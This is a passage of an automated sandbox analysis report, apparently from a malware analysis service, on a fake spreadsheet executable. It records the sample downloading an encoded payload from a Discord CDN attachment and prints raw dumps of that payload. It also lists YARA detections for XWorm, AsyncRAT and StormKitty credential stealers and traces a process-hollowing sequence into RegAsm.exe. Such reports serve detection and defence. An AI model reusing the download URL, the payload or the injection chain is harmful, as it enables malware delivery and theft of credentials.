                                    Sep 26, 2024 13:26:09.438549995 CEST5590953192.168.2.41.1.1.1
                                    Sep 26, 2024 13:26:09.446840048 CEST53559091.1.1.1192.168.2.4
                                    Sep 26, 2024 13:26:28.676868916 CEST53544621.1.1.1192.168.2.4

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Sep 26, 2024 13:26:09.438549995 CEST192.168.2.41.1.1.10x6c50Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)false

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Sep 26, 2024 13:26:09.446840048 CEST1.1.1.1192.168.2.40x6c50No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)false
                                    Sep 26, 2024 13:26:09.446840048 CEST1.1.1.1192.168.2.40x6c50No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)false
                                    Sep 26, 2024 13:26:09.446840048 CEST1.1.1.1192.168.2.40x6c50No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)false
                                    Sep 26, 2024 13:26:09.446840048 CEST1.1.1.1192.168.2.40x6c50No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)false
                                    Sep 26, 2024 13:26:09.446840048 CEST1.1.1.1192.168.2.40x6c50No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)false

                                    HTTP Request Dependency Graph

                                    • cdn.discordapp.com

                                    HTTPS Proxied Packets

                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.449730162.159.135.2334436696C:\Users\user\Desktop\rDoc5633276235623657_xls.exe
                                    TimestampBytes transferredDirectionData
                                    2024-09-26 11:26:10 UTC228OUTGET /attachments/1288648799220400244/1288791621017669705/xxxxxxxxxxx.txt?ex=66f6783b&is=66f526bb&hm=22a3bafe0f63ec86e36ba63ace27289331a1b6e8c8a217e16ac633d8848215f6& HTTP/1.1
                                    Host: cdn.discordapp.com
                                    Connection: Keep-Alive
                                    2024-09-26 11:26:10 UTC1197INHTTP/1.1 200 OK
                                    Date: Thu, 26 Sep 2024 11:26:10 GMT
                                    Content-Type: text/plain; charset=utf-8
                                    Content-Length: 47116
                                    Connection: close
                                    CF-Ray: 8c92e5c28dae0fa1-EWR
                                    CF-Cache-Status: HIT
                                    Accept-Ranges: bytes, bytes
                                    Age: 2758
                                    Cache-Control: public, max-age=31536000
                                    Content-Disposition: attachment; filename="xxxxxxxxxxx.txt"
                                    ETag: "efe5395a9aab18d954883ce839ad5aa2"
                                    Expires: Fri, 26 Sep 2025 11:26:10 GMT
                                    Last-Modified: Thu, 26 Sep 2024 09:17:47 GMT
                                    Vary: Accept-Encoding
                                    alt-svc: h3=":443"; ma=86400
                                    x-goog-generation: 1727342267109578
                                    x-goog-hash: crc32c=zkZLIw==
                                    x-goog-hash: md5=7+U5WpqrGNlUiDzoOa1aog==
                                    x-goog-metageneration: 1
                                    x-goog-storage-class: STANDARD
                                    x-goog-stored-content-encoding: identity
                                    x-goog-stored-content-length: 47116
                                    x-guploader-uploadid: AD-8ljsJuSPaJS19TY8U94YlW26Vn9Tw2YGcALyNFmaVDqbE-U1f7iC8vX2BO_tvwTD13x3QmBjSabu91w
                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                    Set-Cookie: __cf_bm=fehOqRd3LEuUbVYvSUFJypfK8MSFC6GXFPc8ORfDhg0-1727349970-1.0.1.1-lk4rK4NOqKzgNzhCO4hntpGyyaKv_TqrawBYLXhcDxMWhS0LxZQqIcENInSzxMHLLatdV4hk_icsBUrgJDpQpA; path=/; expires=Thu, 26-Sep-24 11:56:10 GMT; domain=.discordapp.com; HttpOnly; Secure
                                    2024-09-26 11:26:10 UTC529INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 33 31 45 6d 4e 69 59 51 49 66 38 74 25 32 46 4c 61 38 34 34 74 4d 25 32 46 51 7a 77 43 61 6d 4f 6c 63 57 61 77 53 6a 52 64 25 32 42 52 72 73 65 5a 38 61 25 32 46 4c 44 41 59 68 73 39 6a 57 57 65 36 30 36 4f 44 44 57 48 34 46 35 25 32 42 37 4e 25 32 42 6e 75 51 34 51 62 4b 7a 30 50 30 57 59 53 5a 7a 46 72 65 42 50 66 37 25 32 42 64 30 25 32 46 73 5a 63 38 51 64 5a 65 6a 25 32 42 56 36 78 6b 4f 53 41 45 37 25 32 46 41 69 37 34 59 4b 4d 65 65 71 65 31 63 37 41 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e
                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=31EmNiYQIf8t%2FLa844tM%2FQzwCamOlcWawSjRd%2BRrseZ8a%2FLDAYhs9jWWe606ODDWH4F5%2B7N%2BnuQ4QbKz0P0WYSZzFreBPf7%2Bd0%2FsZc8QdZej%2BV6xkOSAE7%2FAi74YKMeeqe1c7A%3D%3D"}],"group":"cf-n
                                    2024-09-26 11:26:10 UTC1369INData Raw: 66 4b 32 4e 61 51 78 48 56 59 5a 56 54 41 6f 2b 4e 65 4c 79 57 4e 6b 4c 67 47 45 66 74 62 47 65 73 48 52 63 61 77 39 41 46 64 57 72 67 35 48 6f 65 42 48 4b 79 4f 42 62 63 55 54 2b 65 71 7a 64 38 6e 76 6a 31 56 58 54 6b 33 6c 74 39 50 41 51 5a 44 7a 4d 73 65 52 31 44 69 44 65 75 43 47 77 69 69 57 57 53 50 48 41 73 55 54 32 50 79 79 35 77 7a 72 5a 36 46 5a 76 4f 59 6a 67 54 7a 53 30 4b 34 74 32 33 55 67 64 49 62 6e 50 38 6a 73 50 48 49 6c 6a 6c 6b 74 45 72 4e 5a 72 65 79 7a 5a 53 57 74 2f 2b 30 37 31 54 58 58 6f 6a 35 38 43 75 62 32 69 32 30 69 51 66 58 6d 45 2b 6d 2f 63 32 74 38 54 54 7a 35 30 6b 77 30 47 2b 73 41 78 72 51 6d 68 62 57 74 77 31 42 46 50 71 52 48 70 7a 4a 33 33 54 6c 42 43 61 49 63 73 51 6a 56 66 44 72 65 43 73 78 64 47 74 45 78 56 5a 69 74
                                    Data Ascii: fK2NaQxHVYZVTAo+NeLyWNkLgGEftbGesHRcaw9AFdWrg5HoeBHKyOBbcUT+eqzd8nvj1VXTk3lt9PAQZDzMseR1DiDeuCGwiiWWSPHAsUT2Pyy5wzrZ6FZvOYjgTzS0K4t23UgdIbnP8jsPHIljlktErNZreyzZSWt/+071TXXoj58Cub2i20iQfXmE+m/c2t8TTz50kw0G+sAxrQmhbWtw1BFPqRHpzJ33TlBCaIcsQjVfDreCsxdGtExVZit
                                    2024-09-26 11:26:10 UTC1369INData Raw: 49 44 74 36 44 34 54 4f 57 4b 33 34 61 43 43 4e 46 42 2f 44 70 4f 6f 62 52 50 5a 72 75 2f 78 75 2b 50 61 37 6f 35 47 39 4a 66 47 4c 70 42 50 74 65 50 62 59 76 47 6b 4e 42 44 50 78 78 59 6c 43 4f 74 7a 2b 76 59 66 55 48 37 2f 58 62 74 4a 4d 78 56 65 52 53 2f 4b 38 6a 58 75 55 33 49 61 30 48 6a 33 53 68 42 39 35 54 64 55 78 36 38 2b 57 46 53 4c 55 4f 44 72 75 32 6f 62 54 43 52 73 7a 6d 76 51 6f 32 74 50 63 51 38 37 33 4c 4e 77 75 65 75 6d 38 34 4e 63 45 64 68 6e 61 55 57 47 30 43 63 62 7a 73 30 72 2f 32 69 48 73 45 5a 49 6d 4b 4a 79 34 71 38 42 71 54 44 75 45 6b 2f 53 43 61 55 6f 49 73 44 6c 45 32 34 65 43 67 2b 36 73 34 5a 33 57 53 61 7a 4d 39 61 58 41 42 71 39 77 58 44 43 6b 6c 47 6e 54 5a 4f 31 2f 6c 6d 34 71 58 45 4c 43 56 45 67 2f 30 72 67 6f 30 49 41
                                    Data Ascii: IDt6D4TOWK34aCCNFB/DpOobRPZru/xu+Pa7o5G9JfGLpBPtePbYvGkNBDPxxYlCOtz+vYfUH7/XbtJMxVeRS/K8jXuU3Ia0Hj3ShB95TdUx68+WFSLUODru2obTCRszmvQo2tPcQ873LNwueum84NcEdhnaUWG0Ccbzs0r/2iHsEZImKJy4q8BqTDuEk/SCaUoIsDlE24eCg+6s4Z3WSazM9aXABq9wXDCklGnTZO1/lm4qXELCVEg/0rgo0IA
                                    2024-09-26 11:26:10 UTC1369INData Raw: 38 31 49 35 74 6f 65 62 49 76 36 4e 65 2b 79 66 6e 75 65 6b 48 31 4f 2f 6e 75 6c 4e 44 49 41 30 36 30 47 6a 6a 75 32 76 50 73 6d 66 55 4f 4c 43 35 43 37 71 75 2f 42 5a 5a 5a 2b 69 68 69 79 31 67 33 64 79 56 71 76 67 75 43 55 6d 4f 36 43 6b 51 66 67 33 55 6e 69 71 39 69 34 64 48 76 51 43 74 64 6f 49 43 69 72 78 66 36 34 46 57 76 32 36 64 56 2b 6e 70 69 4f 4b 64 7a 51 33 6d 33 58 7a 31 56 49 69 51 57 4c 47 6a 46 45 63 73 77 34 45 78 39 4f 43 6f 4a 53 67 45 71 47 73 7a 37 33 55 69 2b 77 43 35 61 52 50 78 64 6a 37 61 69 67 36 47 2f 50 64 2f 77 36 4e 34 35 33 33 62 6b 6d 64 5a 34 43 43 58 5a 31 4b 49 31 75 4c 32 50 7a 72 4d 44 45 6a 6b 5a 70 43 6b 37 32 4d 54 6d 30 4e 51 47 68 2f 4f 42 71 63 53 59 55 76 31 54 64 78 34 33 36 47 6c 6e 53 78 5a 78 72 4f 59 5a 34
                                    Data Ascii: 81I5toebIv6Ne+yfnuekH1O/nulNDIA060Gjju2vPsmfUOLC5C7qu/BZZZ+ihiy1g3dyVqvguCUmO6CkQfg3Uniq9i4dHvQCtdoICirxf64FWv26dV+npiOKdzQ3m3Xz1VIiQWLGjFEcsw4Ex9OCoJSgEqGsz73Ui+wC5aRPxdj7aig6G/Pd/w6N4533bkmdZ4CCXZ1KI1uL2PzrMDEjkZpCk72MTm0NQGh/OBqcSYUv1Tdx436GlnSxZxrOYZ4
                                    2024-09-26 11:26:10 UTC1369INData Raw: 79 41 34 69 55 2f 53 65 62 35 50 47 52 6a 5a 66 54 33 36 79 58 33 2f 77 30 66 33 4e 76 79 46 49 72 4e 73 48 38 47 57 65 45 34 6a 30 71 63 76 61 70 4d 4c 42 55 37 6b 73 53 2b 46 6c 32 34 78 45 53 6f 51 6f 61 69 48 4c 69 76 36 58 37 72 79 42 62 49 55 42 55 48 6e 2f 64 32 4f 66 6d 67 4e 48 6d 69 55 69 6b 53 5a 45 30 2f 71 41 56 61 6a 72 72 56 62 50 4f 6d 6b 6e 55 78 65 6c 33 68 71 6d 59 70 65 30 33 66 6c 4d 67 4d 74 53 66 7a 2f 59 68 4a 37 53 45 79 74 53 73 76 4f 69 48 70 53 58 55 31 43 56 54 44 53 6b 32 42 2b 68 68 76 41 35 56 6b 50 45 52 67 38 64 51 2b 4c 67 37 64 55 53 49 6b 51 53 69 33 41 6f 6d 78 4c 79 4f 62 36 2b 54 64 76 55 54 52 45 4c 7a 62 50 45 2b 70 46 35 35 70 71 56 44 6a 67 68 5a 79 70 30 50 72 6e 72 50 35 70 71 78 38 5a 77 32 42 65 50 34 45 78
                                    Data Ascii: yA4iU/Seb5PGRjZfT36yX3/w0f3NvyFIrNsH8GWeE4j0qcvapMLBU7ksS+Fl24xESoQoaiHLiv6X7ryBbIUBUHn/d2OfmgNHmiUikSZE0/qAVajrrVbPOmknUxel3hqmYpe03flMgMtSfz/YhJ7SEytSsvOiHpSXU1CVTDSk2B+hhvA5VkPERg8dQ+Lg7dUSIkQSi3AomxLyOb6+TdvUTRELzbPE+pF55pqVDjghZyp0PrnrP5pqx8Zw2BeP4Ex
                                    2024-09-26 11:26:10 UTC1369INData Raw: 69 6f 73 33 54 58 70 77 45 56 73 64 65 57 59 32 73 63 35 6c 44 43 69 69 6d 63 48 64 70 62 6c 4b 4a 65 51 48 73 74 79 58 35 6b 59 67 77 33 6c 33 78 64 50 73 56 46 72 54 52 47 65 4e 74 4c 57 57 33 33 64 36 4e 44 30 52 4f 76 4b 77 41 41 58 37 6f 53 47 76 4b 72 66 58 2b 6e 72 47 4c 41 42 55 2b 35 71 38 61 34 65 4d 45 57 64 55 67 73 63 67 31 66 53 34 32 57 58 30 6b 32 49 56 57 59 79 34 65 71 51 4f 30 79 43 5a 52 46 7a 41 4b 50 6e 44 36 6c 55 78 6c 48 7a 74 58 7a 37 38 6d 6f 6c 78 32 44 67 74 55 36 57 42 67 6a 39 68 61 46 6e 64 2f 6b 67 74 6b 43 5a 70 5a 52 67 43 74 57 77 48 4a 47 59 74 33 30 53 4b 30 41 34 75 68 4a 46 36 70 78 36 79 31 56 61 4b 34 7a 50 66 76 2f 4f 54 70 4a 31 4f 47 38 45 54 4f 4a 73 47 4f 6b 69 53 6e 4d 6b 36 55 48 55 7a 65 6f 58 6f 79 31 6b
                                    Data Ascii: ios3TXpwEVsdeWY2sc5lDCiimcHdpblKJeQHstyX5kYgw3l3xdPsVFrTRGeNtLWW33d6ND0ROvKwAAX7oSGvKrfX+nrGLABU+5q8a4eMEWdUgscg1fS42WX0k2IVWYy4eqQO0yCZRFzAKPnD6lUxlHztXz78molx2DgtU6WBgj9haFnd/kgtkCZpZRgCtWwHJGYt30SK0A4uhJF6px6y1VaK4zPfv/OTpJ1OG8ETOJsGOkiSnMk6UHUzeoXoy1k
                                    2024-09-26 11:26:10 UTC1369INData Raw: 76 33 55 43 67 55 2b 66 47 4d 6c 45 64 35 36 50 48 31 66 69 65 59 6f 31 6a 6f 77 45 39 41 63 53 48 4a 59 6f 69 44 76 4c 77 44 35 77 68 33 38 4d 62 43 31 34 41 50 76 64 36 4b 56 78 2f 64 65 41 72 61 65 43 5a 31 75 63 67 38 35 6b 32 75 53 6d 46 4a 2f 79 70 37 63 6b 4c 75 30 47 63 70 4c 38 52 6a 4a 50 2f 51 4e 66 34 53 46 74 65 67 30 36 64 35 59 45 56 64 35 6b 47 6c 31 36 50 55 50 35 42 6e 46 5a 31 48 69 6a 6d 2b 41 6b 67 35 77 73 59 65 75 45 57 67 55 69 4f 79 2b 44 73 44 6c 32 48 2f 6b 41 33 68 78 54 53 6e 46 62 68 33 63 56 6d 4e 35 59 76 6b 72 63 69 59 6d 67 56 70 69 30 4d 65 7a 4b 70 67 51 4a 51 79 53 75 50 4c 39 37 33 4b 61 77 78 58 35 45 6a 7a 46 5a 41 70 48 69 72 4f 38 57 61 72 6b 45 68 4b 71 49 47 48 4c 79 31 65 76 4c 43 43 41 30 51 2f 33 75 6c 69 63
                                    Data Ascii: v3UCgU+fGMlEd56PH1fieYo1jowE9AcSHJYoiDvLwD5wh38MbC14APvd6KVx/deAraeCZ1ucg85k2uSmFJ/yp7ckLu0GcpL8RjJP/QNf4SFteg06d5YEVd5kGl16PUP5BnFZ1Hijm+Akg5wsYeuEWgUiOy+DsDl2H/kA3hxTSnFbh3cVmN5YvkrciYmgVpi0MezKpgQJQySuPL973KawxX5EjzFZApHirO8WarkEhKqIGHLy1evLCCA0Q/3ulic
                                    2024-09-26 11:26:10 UTC1369INData Raw: 53 56 44 5a 4d 76 5a 65 68 6d 54 4a 49 67 43 48 4a 63 2b 51 46 41 52 2b 48 4d 4f 77 56 48 37 4e 33 77 76 54 45 41 51 53 45 37 73 6e 44 75 47 44 33 6b 63 2b 70 49 70 42 39 68 76 4f 35 64 48 51 4f 36 43 68 4b 48 6e 54 43 4c 7a 70 6a 61 2b 4f 74 6a 4b 32 41 4d 45 70 4b 37 2f 39 62 32 4e 2f 6e 48 39 7a 43 39 47 68 79 45 46 6a 6b 52 37 49 77 61 50 74 4c 63 75 44 77 4c 62 64 45 74 50 4d 5a 4e 55 57 36 50 64 58 6a 4c 2f 62 6f 73 47 31 48 68 75 70 65 53 45 59 56 37 2f 56 4d 69 71 4d 56 57 51 64 70 2b 71 36 33 67 46 6f 56 41 7a 36 6c 62 68 6c 6d 42 4a 62 6c 70 54 57 37 39 50 49 42 64 69 48 74 6d 75 32 71 6c 61 6c 53 45 37 41 45 46 46 34 2f 70 52 50 4f 33 2b 4d 77 71 46 69 43 38 64 33 56 44 73 63 66 66 36 6e 78 47 63 45 73 4e 35 4a 4a 7a 66 6e 78 78 6e 44 69 67 38
                                    Data Ascii: SVDZMvZehmTJIgCHJc+QFAR+HMOwVH7N3wvTEAQSE7snDuGD3kc+pIpB9hvO5dHQO6ChKHnTCLzpja+OtjK2AMEpK7/9b2N/nH9zC9GhyEFjkR7IwaPtLcuDwLbdEtPMZNUW6PdXjL/bosG1HhupeSEYV7/VMiqMVWQdp+q63gFoVAz6lbhlmBJblpTW79PIBdiHtmu2qlalSE7AEFF4/pRPO3+MwqFiC8d3VDscff6nxGcEsN5JJzfnxxnDig8
                                    2024-09-26 11:26:10 UTC1369INData Raw: 56 34 62 31 39 47 49 79 73 71 6e 63 73 30 64 41 31 2b 59 4f 67 7a 34 5a 43 30 55 4f 48 47 34 78 78 65 72 64 62 57 4d 6a 30 34 6c 30 67 37 52 4a 76 42 31 37 57 6c 45 4b 6f 54 70 30 4b 4d 79 57 76 4a 58 4e 47 45 36 65 59 62 31 62 45 47 39 77 6e 4f 44 68 6a 48 50 62 59 6d 69 2b 7a 79 53 65 36 54 6e 75 7a 51 64 54 55 45 78 4d 30 4e 6a 31 51 69 43 30 5a 48 70 6e 69 4b 47 78 6e 4b 78 36 37 72 55 59 55 71 43 65 62 7a 38 59 76 41 74 70 49 67 41 55 72 6c 66 47 41 41 50 34 30 53 78 6f 43 44 61 42 66 74 71 71 68 67 58 39 62 38 64 7a 39 6d 71 7a 2f 65 73 79 4f 55 49 2b 41 66 50 54 75 51 4d 39 4b 2f 68 64 52 34 50 32 50 43 4f 33 4a 4b 74 48 43 31 57 2b 71 49 49 61 56 77 37 64 35 78 4e 74 77 44 51 48 33 36 39 4f 36 72 68 70 6c 55 64 62 53 71 64 31 7a 46 77 46 39 2b 51
                                    Data Ascii: V4b19GIysqncs0dA1+YOgz4ZC0UOHG4xxerdbWMj04l0g7RJvB17WlEKoTp0KMyWvJXNGE6eYb1bEG9wnODhjHPbYmi+zySe6TnuzQdTUExM0Nj1QiC0ZHpniKGxnKx67rUYUqCebz8YvAtpIgAUrlfGAAP40SxoCDaBftqqhgX9b8dz9mqz/esyOUI+AfPTuQM9K/hdR4P2PCO3JKtHC1W+qIIaVw7d5xNtwDQH369O6rhplUdbSqd1zFwF9+Q
                                    2024-09-26 11:26:10 UTC1369INData Raw: 73 37 6f 78 34 53 48 46 65 68 57 65 38 6e 46 72 34 76 45 34 63 43 32 4d 44 30 34 73 72 45 39 74 67 73 52 64 4a 4f 38 42 69 72 6e 54 51 38 69 54 79 6c 66 65 41 48 57 4d 64 65 6d 67 55 78 33 71 47 63 53 47 51 52 44 6b 79 46 46 74 53 46 71 71 42 35 32 41 46 54 64 73 74 75 70 73 47 34 53 58 51 72 75 76 6d 68 52 50 68 75 74 30 4d 6b 63 73 5a 4b 51 73 41 66 52 5a 75 75 50 43 71 7a 68 30 6c 2b 6f 65 4b 6d 46 72 74 6a 5a 62 78 79 79 4b 62 59 38 66 4a 6b 4e 38 72 7a 51 50 77 32 33 53 41 78 58 6f 69 6e 58 4b 6b 6b 48 6b 48 72 70 34 56 69 48 49 74 53 45 7a 79 53 78 39 41 45 43 7a 43 42 75 68 4a 61 65 41 72 32 57 36 6a 53 2b 7a 36 75 36 67 48 4e 6a 41 69 36 4f 64 35 77 4e 4a 4a 41 31 58 30 45 67 4d 38 61 4b 75 41 30 4f 48 67 4c 70 53 56 58 76 64 64 68 52 49 45 4f 5a
                                    Data Ascii: s7ox4SHFehWe8nFr4vE4cC2MD04srE9tgsRdJO8BirnTQ8iTylfeAHWMdemgUx3qGcSGQRDkyFFtSFqqB52AFTdstupsG4SXQruvmhRPhut0MkcsZKQsAfRZuuPCqzh0l+oeKmFrtjZbxyyKbY8fJkN8rzQPw23SAxXoinXKkkHkHrp4ViHItSEzySx9AECzCBuhJaeAr2W6jS+z6u6gHNjAi6Od5wNJJA1X0EgM8aKuA0OHgLpSVXvddhRIEOZ


                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Target ID:0
                                    Start time:07:26:08
                                    Start date:26/09/2024
                                    Path:C:\Users\user\Desktop\rDoc5633276235623657_xls.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\rDoc5633276235623657_xls.exe"
                                    Imagebase:0x970000
                                    File size:86'528 bytes
                                    MD5 hash:D5489DA5AA14ED9D71D8338EC41A1BC1
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1784666277.0000000002DB4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1784666277.0000000002DB4000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                    Reputation:low
                                    Has exited:true

                                    General

                                    Target ID:1
                                    Start time:07:26:09
                                    Start date:26/09/2024
                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                    Imagebase:0x50000
                                    File size:65'440 bytes
                                    MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:2
                                    Start time:07:26:09
                                    Start date:26/09/2024
                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                    Imagebase:0xb10000
                                    File size:65'440 bytes
                                    MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000002.2652861730.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000002.00000002.2652861730.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                    • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000002.00000002.2660991014.0000000006AD0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2660991014.0000000006AD0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_BrowserPasswordDump_1, Description: Yara detected BrowserPasswordDump, Source: 00000002.00000002.2660991014.0000000006AD0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000002.00000002.2660991014.0000000006AD0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                    • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000002.00000002.2654703990.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000002.2654703990.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2654703990.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:9
                                    Start time:07:27:35
                                    Start date:26/09/2024
                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7008 -s 2044
                                    Imagebase:0x5c0000
                                    File size:483'680 bytes
                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Disassembly

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:33.9%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:17.5%
                                      Total number of Nodes:80
                                      Total number of Limit Nodes:4
                                      execution_graph 2392 2b03d20 2393 2b03d6b VirtualAllocEx 2392->2393 2394 2b03da2 2393->2394 2384 2b03c51 2385 2b03c58 ReadProcessMemory 2384->2385 2387 2b03ce6 2385->2387 2293 2b00a28 2294 2b00a42 2293->2294 2297 2b00fa0 2294->2297 2298 2b00fd7 2297->2298 2304 2b02b21 2298->2304 2314 2b02b28 2298->2314 2324 2b02b17 2298->2324 2334 2b035a6 2298->2334 2299 2b00ab2 2313 2b02b28 2304->2313 2305 2b035fa 2305->2299 2310 2b02234 WriteProcessMemory 2310->2313 2313->2305 2313->2310 2344 2b021ec 2313->2344 2348 2b021f8 2313->2348 2352 2b02210 2313->2352 2356 2b02228 2313->2356 2360 2b02240 2313->2360 2364 2b02258 2313->2364 2316 2b02b5b 2314->2316 2315 2b035fa 2315->2299 2316->2315 2317 2b021ec CreateProcessA 2316->2317 2318 2b021f8 Wow64SetThreadContext 2316->2318 2319 2b02210 ReadProcessMemory 2316->2319 2320 2b02228 VirtualAllocEx 2316->2320 2321 2b02234 WriteProcessMemory 2316->2321 2322 2b02240 Wow64SetThreadContext 2316->2322 2323 2b02258 ResumeThread 2316->2323 2317->2316 2318->2316 2319->2316 2320->2316 2321->2316 2322->2316 2323->2316 2333 2b02b91 2324->2333 2325 2b035fa 2325->2299 2326 2b021ec CreateProcessA 2326->2333 2327 2b021f8 Wow64SetThreadContext 2327->2333 2328 2b02210 ReadProcessMemory 2328->2333 2329 2b02228 VirtualAllocEx 2329->2333 2330 2b02234 WriteProcessMemory 2330->2333 2331 2b02240 Wow64SetThreadContext 2331->2333 2332 2b02258 ResumeThread 2332->2333 2333->2325 2333->2326 2333->2327 2333->2328 2333->2329 2333->2330 2333->2331 2333->2332 2343 2b02c06 2334->2343 2335 2b035fa 2335->2299 2336 2b021ec CreateProcessA 2336->2343 2337 2b021f8 Wow64SetThreadContext 2337->2343 2338 2b02210 ReadProcessMemory 2338->2343 2339 2b02228 VirtualAllocEx 2339->2343 2340 2b02234 WriteProcessMemory 2340->2343 2341 2b02240 Wow64SetThreadContext 2341->2343 2342 2b02258 ResumeThread 2342->2343 2343->2335 2343->2336 2343->2337 2343->2338 2343->2339 2343->2340 2343->2341 2343->2342 2345 2b03798 CreateProcessA 2344->2345 2347 2b039e2 2345->2347 2349 2b03b90 Wow64SetThreadContext 2348->2349 2351 2b03c16 2349->2351 2351->2313 2353 2b03c58 ReadProcessMemory 2352->2353 2355 2b03ce6 2353->2355 2355->2313 2357 2b03d28 VirtualAllocEx 2356->2357 2359 2b03da2 2357->2359 2359->2313 2361 2b03b90 Wow64SetThreadContext 2360->2361 2363 2b03c16 2361->2363 2363->2313 2365 2b03ec0 ResumeThread 2364->2365 2367 2b03f2e 2365->2367 2367->2313 2372 2b00a18 2373 2b00a28 2372->2373 2375 2b00fa0 7 API calls 2373->2375 2374 2b00ab2 2375->2374 2388 2b03dd8 2390 2b03de0 WriteProcessMemory 2388->2390 2391 2b03e7c 2390->2391 2368 2b03eb9 2369 2b03ec0 ResumeThread 2368->2369 2371 2b03f2e 2369->2371 2376 2b03b89 2378 2b03b90 Wow64SetThreadContext 2376->2378 2379 2b03c16 2378->2379 2380 2b0378d 2381 2b03824 2380->2381 2381->2381 2382 2b0396c CreateProcessA 2381->2382 2383 2b039e2 2382->2383

                                      Executed Functions

                                      Function 02B02B28 Relevance: 1.9, Strings: 1, Instructions: 616COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
